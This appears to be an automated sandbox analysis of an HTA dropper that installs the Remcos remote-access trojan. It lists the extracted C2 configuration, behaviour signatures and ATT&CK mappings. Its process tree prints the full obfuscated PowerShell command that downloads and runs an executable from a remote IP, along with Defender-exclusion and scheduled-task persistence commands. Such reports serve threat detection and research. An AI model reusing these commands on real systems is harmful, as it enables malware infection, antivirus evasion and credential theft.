Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
25-09-2024 07:04
General
-
Target
9f71dfb4c82b046b86940ff82f86cadf.hta
-
Size
115KB
-
MD5
9f71dfb4c82b046b86940ff82f86cadf
-
SHA1
6bcd13d4f0e0ebf49b1107cd120368230effd547
-
SHA256
3dab14859030e20708a39df701feb49b3b33097a3b1178d1801be40746c43232
-
SHA512
bd64fe93e298261840995ba2a1f46418ffcc87875682d1ee921063c0e3911ad407efd086c96a7ee4643a673b6b678aab2aa89d8d90ec76d4ae7b21cd3a2686ba
-
SSDEEP
48:7oa+apd7Ah23jBZ9mqYZ9NqZ4v0te2RVC1c8oawopyZAqXl9RXGbZ9nZ9GZkBUyN:Ea+M77929kRVTTwcnlXu9Z9K9s8AT
Malware Config
Extracted
remcos
RemoteHost
hiddenrmcnew.duckdns.org:7839
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-PW8G0U
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
-
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 5 IoCs
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 48 IoCs
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\9f71dfb4c82b046b86940ff82f86cadf.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C pOWERSHelL -ex ByPass -nOP -W 1 -c DeviCeCREdENtiALdeplOymeNT ; IEx($(iex('[SYsteM.TEXt.eNCOdiNg]'+[Char]58+[char]0x3a+'utf8.GETStrIng([SySteM.COnVErt]'+[chAR]58+[chaR]58+'fROMbAsE64strINg('+[Char]0X22+'JG5UYWdMdzIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVSZEVmSU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG11byxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuTWtYQlBGcCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFV6SFJWSURUR3UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQnhNUXB2KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQkpaSiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZXNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkblRhZ0x3Mjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMTEzLjI1Mi8xNzEvYXVkaW9kZy5leGUiLCIkZW52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7c3RhcnQtc2xlRXAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[ChAR]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWERSHelL -ex ByPass -nOP -W 1 -c DeviCeCREdENtiALdeplOymeNT ; IEx($(iex('[SYsteM.TEXt.eNCOdiNg]'+[Char]58+[char]0x3a+'utf8.GETStrIng([SySteM.COnVErt]'+[chAR]58+[chaR]58+'fROMbAsE64strINg('+[Char]0X22+'JG5UYWdMdzIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLVRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNQmVSZEVmSU5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxtb24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAga08sc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG11byxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuTWtYQlBGcCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFV6SFJWSURUR3UsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQnhNUXB2KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiQkpaSiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZXNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkblRhZ0x3Mjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMTEzLjI1Mi8xNzEvYXVkaW9kZy5leGUiLCIkZW52OkFQUERBVEFcYXVkaW9kZy5leGUiLDAsMCk7c3RhcnQtc2xlRXAoMyk7c1RBcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGF1ZGlvZGcuZXhlIg=='+[ChAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fcogh0q5\fcogh0q5.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7947.tmp" "c:\Users\Admin\AppData\Local\Temp\fcogh0q5\CSCB9D96DB0692E48FE89FCB488781522C.TMP"5⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\audiodg.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\wUtVQHiucCbXP.exe"5⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wUtVQHiucCbXP" /XML "C:\Users\Admin\AppData\Local\Temp\tmpC3DC.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\audiodg.exeC:\Users\Admin\AppData\Roaming\audiodg.exe /stext "C:\Users\Admin\AppData\Local\Temp\hqwngusqwnodgqbmb"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exeC:\Users\Admin\AppData\Roaming\audiodg.exe /stext "C:\Users\Admin\AppData\Local\Temp\ksbghmdjkvgqrwpqkkqj"6⤵
- Executes dropped EXE
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\audiodg.exeC:\Users\Admin\AppData\Roaming\audiodg.exe /stext "C:\Users\Admin\AppData\Local\Temp\ungyifnlyeyvtkmucuclmypr"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD59faf6f9cd1992cdebfd8e34b48ea9330
SHA1ae792d2551c6b4ad5f3fa5585c0b0d911c9f868e
SHA2560c45700b2e83b229e25383569b85ddc0107450c43443a11633b53daf1aaed953
SHA51205b34627f348b2973455691bcb7131e4a5236cfece653d22432746ccd14d211b9b279f0913fbd7bb150f00eb2f2c872f4f5518f3903e024699fd23c50d679e97
-
Filesize
19KB
MD56ca35bad842896fa47e13ec29c383674
SHA1f47f271760bf5562876356a414f6eb0a8dd4eeaf
SHA256db08fc4b68e64b48ff98b18230c9365aa3e2a00698e45cc6f6bdba9ed64a47c5
SHA51205ad66dfa3bab88230d0e5ba9726d9a54388b95e86ac10e7c61ad10f2700ddccfb08ba75b549396a2932af3dd5c938f5ab84965e9e6aa028368c3549e1a7e8f6
-
Filesize
18KB
MD56a3d7def281da825b91dd540e7473b9a
SHA1e4f92302db4f6883de208ed82e1cf84add5c73df
SHA2562a5262f2a3b44f0e634265ff59f095aed4fde895e2a71aa5c51cae831f8e79a5
SHA512454c03b35408fb747071147c171f1ce7c10678182c1a900dcfe03d5acb1850e0adb5f72be8771d69af2cea2d0e3d51f382a989b6abacd4a3b3ca1cdedb9b2d05
-
Filesize
1KB
MD5b9d39c60fbc232255b9294a19de9189e
SHA10bef28b266e9354d3d78d35fc4c8fb832c268fa3
SHA256f0f8e7f38b3a99c930158026c68af91de987bc0ee513bcd3e879d72b75ea4297
SHA512a187aaf456c86f3190e329d44b33295aa192fd1eae359a0b4d10aa2b7d89dc6c55fae31aff665f1e32c5ed7a69aeea8447196734e5cdab352d3a294b131c0628
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5ac79bfc734cbfd1290e60875d9e9e449
SHA140139fd282207d9f86e332d1e1024f3509aada74
SHA2567be25c90232ae6afac993809280208896da789196ce9855c08e462a615be1c3e
SHA51267c772ce9dd6ac6690a684a720ddfbefea61001c6720d7857a024610e3044e8ceaf4ff67b2c781f2f2455321100b2acd43d3896cbf04fbe61825dc978f6420c5
-
Filesize
4KB
MD516f4f7c4051f4bbdaa93a1ca80690065
SHA1750cacbdd2d089a88119374560d6ac004954e90e
SHA2566c4559e4413cccaeab73cad48ffd804506c95566e4d6a3f5ae64017a33ea6ec2
SHA512cb0f68d393ad03a5c802a2978ff7b12e20911bac5e27200c2df16d5d3f63dfc2387c0cd1a9075d8e4ba9ae804a6b61225575e2f42b3ef024e863d5b172417964
-
Filesize
1KB
MD5d7bb1e051183f8ff727612f873d64c7a
SHA1819a563ad63b8cfbd742f1e36010d69e58589feb
SHA25636d683bcb73ad051cad755aa46528da23d33a335c2e00b31d6a06f672df3cb62
SHA5120010ef96bbf9154a9b54c308207c55cff957740092e98e3f739bfad82ea7b86076ac82df69af6ce78ba37e78aaba3bfb382408ce5119e2ee3812f4f67fc36bc7
-
Filesize
1.1MB
MD5311148c65ef0cadb803bccc2cf922fee
SHA1d70c32206a52470e3b622984e7fb6ab7668c5919
SHA256ff67f46cb0b8c93cc038c969376a92b04ab3809b0efd52f99bdfbbd9a991cc87
SHA5128a998d9e89a53b65ef1d5a996f5540d0c0ba7f964af274ef5991dac3c4fd6c3eb4b89f5bc54449b797ffede1f57bd8d4604f4df3cd46fadb6dc94391713208cc
-
Filesize
652B
MD596b0f00697f6c4af916c8c73752bda27
SHA1074c4b1acbb960415238aba8a830832f9bc0415f
SHA25627980bd3ae9acd0c1287cc79eeb4a0bdb5df4bc2497c322d8ffe5b986b9ec732
SHA5123929438acf284ccc93e6612851ff38ee43d4fcfdd76f288b54877f0fc829bdd57e2fc4867270ea850d24f1672e40a82a4b62e2d7377c13234ae3c9aaa2382601
-
Filesize
473B
MD53bb844530f01f0263d147fc639cdaa17
SHA172a54c9e60fa65951724c7785e23472b5434bb6d
SHA256b7a4df6b846ba78b9234d149ebddc645595ea3ed7de89e667ac1d070d5c20231
SHA512b05fcd2cd4788d9887d93e4ba41f94c1620f74b30c550a08c09230525d82cc65aff6fdc6ff5887574f3b3fbe3e4ae06b188a7110f70c22d683d8cca22492084d
-
Filesize
369B
MD5b112e935208d1e56787bc54aae827500
SHA1377174edf1841dd9d4300af36f82e9bc7c348a19
SHA256ff5295e479df95e1d23c39c6559abac691b8ee60ee04be7aaa3c0ead337dc9ea
SHA51249aec5f1a7436b583333f066615bfb7f4e16d01677c15f332d1e850d53b6a356dd5510d6a7b7ad08079f0913c99b5bca05476b5fd2fb3813f575e17777eb9ff5
-
Filesize
3.3MB
-
Filesize
304KB
-
Filesize
80KB
-
Filesize
72KB
-
Filesize
624KB
-
Filesize
768KB
-
Filesize
40KB
-
Filesize
584KB
-
Filesize
1.1MB
-
Filesize
68KB
-
Filesize
304KB
-
Filesize
304KB
-
Filesize
652KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
100KB
-
Filesize
100KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
520KB
-
Filesize
100KB
-
Filesize
520KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
144KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
392KB
-
Filesize
4KB
-
Filesize
652KB
-
Filesize
408KB
-
Filesize
3.3MB
-
Filesize
136KB
-
Filesize
304KB
-
Filesize
4KB
-
Filesize
7.7MB
-
Filesize
120KB
-
Filesize
5.6MB
-
Filesize
136KB
-
Filesize
7.7MB
-
Filesize
6.2MB
-
Filesize
7.7MB
-
Filesize
6.5MB
-
Filesize
7.7MB
-
Filesize
104KB
-
Filesize
408KB
-
Filesize
32KB
-
Filesize
200KB
-
Filesize
304KB
-
Filesize
3.3MB
-
Filesize
216KB
-
Filesize
7.7MB
-
Filesize
120KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
80KB
-
Filesize
56KB
-
Filesize
68KB
-
Filesize
600KB
-
Filesize
40KB
-
Filesize
480KB
-
Filesize
480KB
-
Filesize
480KB